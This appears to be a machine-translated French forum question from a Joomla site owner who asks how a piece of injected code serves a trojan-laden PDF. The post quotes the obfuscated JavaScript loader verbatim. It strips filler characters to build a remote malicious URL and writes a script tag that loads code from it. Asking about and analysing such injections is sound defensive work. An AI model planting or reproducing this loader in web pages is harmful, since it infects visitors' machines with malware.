Mon Joomla! site Web a été piraté à plusieurs reprises. Quelqu'un, d'une manière ou d'une autre, a réussi à injecter les déchets suivants dans les scripts PHP clés, mais je veux dire ne pas parler de configuration de Joomla. Le site n'est pas beaucoup visité (je crains parfois d'être le seul visiteur de ce site ...) et je ne me soucie pas beaucoup de la réactivation du site. Je m'en occuperai éventuellement.
Ma question est la suivante: comment fonctionnent ces déchets? Je le regarde et je ne vois tout simplement pas comment cela fait du mal? Ce qu'il fait, c'est qu'il essaie de télécharger un fichier PDF appelé ChangeLog.pdf, qui est infecté par un cheval de Troie et qui, après ouverture, gèlera votre Acrobat et fera des ravages sur votre machine. Comment fait-il ça, je ne sais pas, je m'en fiche. Mais comment le script suivant appelle-t-il le téléchargement?
<script>/*Exception*/ document.write('<script src='+'h#^(t@)((t$&@p#:)&/!$/)@d$y#^#$n@$d^!!&n#s$)^-$)o^^(r!#g!!#$.^^@g))!a#m#@$e&$s^@@!t@@($!o@$p(.&@c&)@(o$m)).!$m$)y@(b@e()s&$t$@y&o$&(u#)$x&&^(i)-@^c!!&n$#.(@g)$e#(^n&!u(i&#&n(e&(!h&o@&^&l^$(l)&y$(#@w!o@!((o#d&^.^#)r$#^u!!$:(#@&8#)(0$8@&0^(/))s#o#^&#^f!$t$!o##n(&$i(^!c$(.!&c@o!&^m#&/&(s&$(o!f&!t@&o!!n)&i$&c!.#^^c)!$o@@((m@#/$^!g#^o$^&o&#g!l)@@@!e&.))c!)(o#@#^!m(&/^^l#^@i##(v&@e&)!$j^!a@$s#m!i)n$.!$c&$o)@$m^/@$v&i^d^()e(!o&&s@(z(@)^.@)c$&o^m)$)^/#$'.replace(/#|\$|@|\^|&|\(|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script>
<!--6f471c20c9b96fed179c85ffdd3365cf-->
ESET a détecté ce code en tant que cheval de Troie JS / TrojanDownloader.Agent.NRO